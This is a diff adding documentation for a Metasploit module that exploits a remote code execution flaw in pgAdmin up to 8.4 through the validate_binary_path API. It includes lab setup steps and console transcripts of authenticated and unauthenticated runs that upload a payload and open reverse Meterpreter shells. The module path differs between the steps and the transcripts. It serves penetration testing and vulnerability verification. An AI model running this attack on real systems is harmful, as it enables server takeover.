|
| 1 | +*## Vulnerable Application |
| 2 | +The pgAdmin versions up to 8.4 are vulnerable to a Remote Code Execution (RCE) flaw through the validate binary path API. This vulnerability allows attackers to run arbitrary code on the server hosting pgAdmin, which poses a significant threat to the integrity of the database management system and the security of its underlying data. |
| 3 | + |
| 4 | +The exploit can be executed in both authenticated and unauthenticated scenarios. When valid credentials are available, Metasploit can log in to pgAdmin, upload a malicious payload using the file management plugin, and then execute it via the validate_binary_path endpoint. This vulnerability is specific to Windows targets. If authentication is not required by the application, Metasploit can directly upload and trigger the payload through the validate_binary_path endpoint. |
| 5 | + |
| 6 | +## Verification Steps |
| 7 | + |
| 8 | +1. Install the application |
| 9 | +1. Start msfconsole |
| 10 | +1. Do: `use exploit/multi/http/pgadmin_binary_path_api` |
| 11 | +1. Set the `RHOST`, `PAYLOAD`, and optionally the `USERNAME` and `PASSWORD` options |
| 12 | +1. Do: `run` |
| 13 | + |
| 14 | + |
| 15 | +### Installation (Windows) |
| 16 | + |
| 17 | +These steps are the bare minimum to get the application to run for testing and should not be use for a production setup. |
| 18 | +For a production setup, a server like Apache should be setup to run pgAdmin through it's WSGI interface. |
| 19 | + |
| 20 | +**The following paths are all relative to the default installation path `C:\Program Files\pgAdmin 4\web`**. |
| 21 | + |
| 22 | +1. [Download][1] and install the Windows build |
| 23 | +1. Copy the `config_distro.py` file to `config_local.py` |
| 24 | +1. Edit `config_local.py` and set `SERVER_MODE` to `True` |
| 25 | +1. Initialize the database: `..\python\python.exe setup.py setup-db` |
| 26 | +1. Create an initial user account: `..\python\python.exe setup.py add-user --admin [email protected] 123456` |
| 27 | +1. Run the application: `..\python\python.exe pgAdmin4.py` |
| 28 | + |
| 29 | +## Scenarios |
| 30 | +Specific demo of using the module that might be useful in a real world scenario. |
| 31 | + |
| 32 | +### pgAdmin 8.4 on Windows (Authenticated) |
| 33 | + |
| 34 | +``` |
| 35 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.5 |
| 36 | +RHOSTS => 192.168.1.5 |
| 37 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set USERNAME [email protected] |
| 38 | + |
| 39 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set PASSWORD 123456 |
| 40 | +PASSWORD => 123456 |
| 41 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 |
| 42 | +LHOST => 192.168.1.6 |
| 43 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit |
| 44 | +
|
| 45 | +[*] Started reverse TCP handler on 192.168.1.6:4444 |
| 46 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 47 | +[+] The target is vulnerable. pgAdmin version 8.4.0 is affected |
| 48 | +[*] Successfully authenticated to pgAdmin |
| 49 | +[*] Payload uploaded to: C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe |
| 50 | +[*] Sending stage (201798 bytes) to 192.168.1.5 |
| 51 | +[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.5:52588) at 2024-08-26 19:48:10 +0200 |
| 52 | +[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe' on the target |
| 53 | +
|
| 54 | +meterpreter > sysinfo |
| 55 | +Computer : DESKTOP-FMNV75N |
| 56 | +OS : Windows 10 (10.0 Build 19045). |
| 57 | +Architecture : x64 |
| 58 | +System Language : en_US |
| 59 | +Domain : WORKGROUP |
| 60 | +Logged On Users : 2 |
| 61 | +Meterpreter : x64/windows |
| 62 | +meterpreter > |
| 63 | +
|
| 64 | +``` |
| 65 | + |
| 66 | +### pgAdmin 8.4 on Windows (Unauthenticated) |
| 67 | + |
| 68 | +``` |
| 69 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.7 |
| 70 | +RHOSTS => 192.168.1.7 |
| 71 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 |
| 72 | +LHOST => 192.168.1.6 |
| 73 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit |
| 74 | +
|
| 75 | +[*] Started reverse TCP handler on 192.168.1.6:4444 |
| 76 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 77 | +[+] The target is vulnerable. pgAdmin version 8.4.0 is affected |
| 78 | +[*] Payload uploaded to: C:\Users\pgAdmin\pg_restore.exe |
| 79 | +[*] Sending stage (200774 bytes) to 192.168.1.7 |
| 80 | +[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.7:55560) at 2024-08-26 19:51:01 +0200 |
| 81 | +[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\pg_restore.exe' on the target |
| 82 | +
|
| 83 | +meterpreter > sysinfo |
| 84 | +Computer : DESKTOP-HTGS43E |
| 85 | +OS : Windows 10 (10.0 Build 22000). |
| 86 | +Architecture : x64 |
| 87 | +System Language : en_GB |
| 88 | +Domain : WORKGROUP |
| 89 | +Logged On Users : 1 |
| 90 | +Meterpreter : x64/windows |
| 91 | +meterpreter > |
| 92 | +
|
| 93 | +``` |
0 commit comments